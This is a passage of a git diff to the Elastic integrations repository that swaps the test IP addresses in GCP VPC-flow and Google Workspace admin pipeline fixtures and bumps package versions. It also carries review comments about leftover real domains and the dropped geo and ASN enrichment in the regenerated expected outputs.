:\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392627800Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01g\",\"jsonPayload\":{\"bytes_sent\":\"5044\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33876},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:37.933154111Z\",\"packets_sent\":\"87\",\"reporter\":\"DEST\",\"rtt_msec\":\"34\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466868771Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466868771Z", "end": "2019-06-14T03:49:37.933154111Z", @@ -25890,18 +25890,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33574, "bytes": 14132, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 91 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:nv2CjECKqbosaYrr1Kt1ArPTXsg=", + "community_id": "1:GUQu5kCJyjYidboU6syeeSdt5Js=", "bytes": 14132, "name": "default", "transport": "tcp", @@ -25923,7 +25923,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, 
@@ -25960,8 +25960,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869346300Z", - "original": "{\"insertId\":\"14iipwlfd8t01l\",\"jsonPayload\":{\"bytes_sent\":\"14132\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33574},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"91\",\"reporter\":\"DEST\",\"rtt_msec\":\"509\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.468484109Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392633300Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01l\",\"jsonPayload\":{\"bytes_sent\":\"14132\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33574},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"91\",\"reporter\":\"DEST\",\"rtt_msec\":\"509\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.468484109Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.468484109Z", "end": "2019-06-14T03:49:51.821056075Z", @@ -25982,10 +25982,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33574, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -25999,7 +25999,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:nv2CjECKqbosaYrr1Kt1ArPTXsg=", + "community_id": "1:GUQu5kCJyjYidboU6syeeSdt5Js=", "bytes": 151213, "name": "default", "transport": "tcp", @@ -26022,7 +26022,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { 
@@ -26058,8 +26058,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869348800Z", - "original": "{\"insertId\":\"14iipwlfd8t01b\",\"jsonPayload\":{\"bytes_sent\":\"151213\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33574,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821129119Z\",\"packets_sent\":\"68\",\"reporter\":\"SRC\",\"rtt_msec\":\"509\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.468484109Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", + "ingested": "2021-12-09T13:37:46.392638900Z", + "original": 
"{\"insertId\":\"14iipwlfd8t01b\",\"jsonPayload\":{\"bytes_sent\":\"151213\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33574,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821129119Z\",\"packets_sent\":\"68\",\"reporter\":\"SRC\",\"rtt_msec\":\"509\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.468484109Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:19.219174745Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:19.219174745Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.468484109Z", "end": "2019-06-14T03:49:51.821129119Z", diff --git a/packages/gcp/manifest.yml b/packages/gcp/manifest.yml index 0c0e33f50d8..c4ea88ff676 100644 --- a/packages/gcp/manifest.yml +++ b/packages/gcp/manifest.yml @@ -1,6 +1,6 @@ name: gcp title: Google Cloud Platform -version: 1.2.0 +version: 1.2.1 release: ga description: Collect logs from Google Cloud Platform with Elastic Agent. type: integration diff --git a/packages/google_workspace/changelog.yml b/packages/google_workspace/changelog.yml index 8ce66900b6b..5e6d2d6ad32 100644 --- a/packages/google_workspace/changelog.yml +++ b/packages/google_workspace/changelog.yml 
@@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.2.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.2.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log index 2d2d36e96a3..fa9088086f8 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log 
@@ -1,9 +1,9 @@ -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"CHANGE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"REORDER_GROUP_BASED_POLICIES_EVENT","parameters":[{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_PRIORITIES","multiValue":["a","b"]},{"name":"SETTING_NAME","value":"setting"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"GPLUS_PREMIUM_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} 
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"UPDATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} -{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"APPLICATION_SETTINGS","name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED","parameters":[{"name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION","value":"FLASHLIGHT_EDU_SELECTION_MANUAL"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"CHANGE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_APPLICATION_SETTING","parameters":[{"name":"APPLICATION_EDITION","value":"basic"},{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"REORDER_GROUP_BASED_POLICIES_EVENT","parameters":[{"name":"APPLICATION_NAME","value":"drive"},{"name":"GROUP_PRIORITIES","multiValue":["a","b"]},{"name":"SETTING_NAME","value":"setting"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"GPLUS_PREMIUM_FEATURES","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"CREATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"DELETE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"UPDATE_MANAGED_CONFIGURATION","parameters":[{"name":"MANAGED_CONFIGURATION_NAME","value":"a"},{"name":"MOBILE_APP_PACKAGE_ID","value":"1234"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"APPLICATION_SETTINGS","name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTED","parameters":[{"name":"FLASHLIGHT_EDU_NON_FEATURED_SERVICES_SELECTION","value":"FLASHLIGHT_EDU_SELECTION_MANUAL"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json index c8ba6f01cfb..13667692276 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-application.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
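Review bot: Since every record of this fixture is rewritten to move the actor IP onto a reserved test value, the same pass could also move the other identifiers that are not documentation-reserved: `"email":"foo@bar.com"` and `"ownerDomain":"elastic.com"` refer to real domains, whereas `GROUP_EMAIL` and `DOMAIN_NAME` in the same records already use `example.com`. Changing them to e.g. `"email":"foo@example.com"` and `"ownerDomain":"example.com"` would keep the fixture free of third-party identifiers in the same way the IP change does; note the expected-output file would then need regenerating too, as `source.user.domain` is derived from the e-mail. The eight records also share one `uniqueQualifier` and timestamp, so this fixture does not exercise event de-duplication or ordering — fine for a pipeline test, but worth knowing if it is ever reused for system tests.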
@@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876830900Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CHANGE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:24.232161700Z", + "original": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CHANGE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CHANGE_APPLICATION_SETTING", "id": "1", @@ -93,7 +75,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
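Review bot: The regenerated expected output removes the entire `source.geo` and `source.as` objects instead of replacing them with the lookup result for 67.43.156.13, so after this change the admin pipeline test no longer asserts anything about the geoip/asn enrichment path — which is the very path the move to the "supported subset" of IPs was meant to make deterministic. If the test stack is expected to resolve 67.43.156.13 from the bundled GeoLite2 test database, the missing blocks suggest the file was regenerated against a stack where that database was not loaded or the geoip processor was skipped, and the expected output should be regenerated with it enabled. If enrichment is intentionally absent from pipeline tests, a sentence in the changelog entry or the data stream's test README stating so would make the loss of coverage clearly deliberate. The same removal repeats in every `source` block of this file.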
@@ -117,35 +99,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876859700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:24.232166900Z", + "original": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"CREATE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", "provider": "admin", "action": "CREATE_APPLICATION_SETTING", "id": "1", @@ -176,7 +140,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -200,35 +164,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:17.876868Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"APPLICATION_SETTINGS\",\"name\":\"DELETE_APPLICATION_SETTING\",\"parameters\":[{\"name\":\"APPLICATION_EDITION\",\"value\":\"basic\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"drive\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"}]}}", + "ingested": "2021-12-09T13:38:24.232172300Z", + "original": 
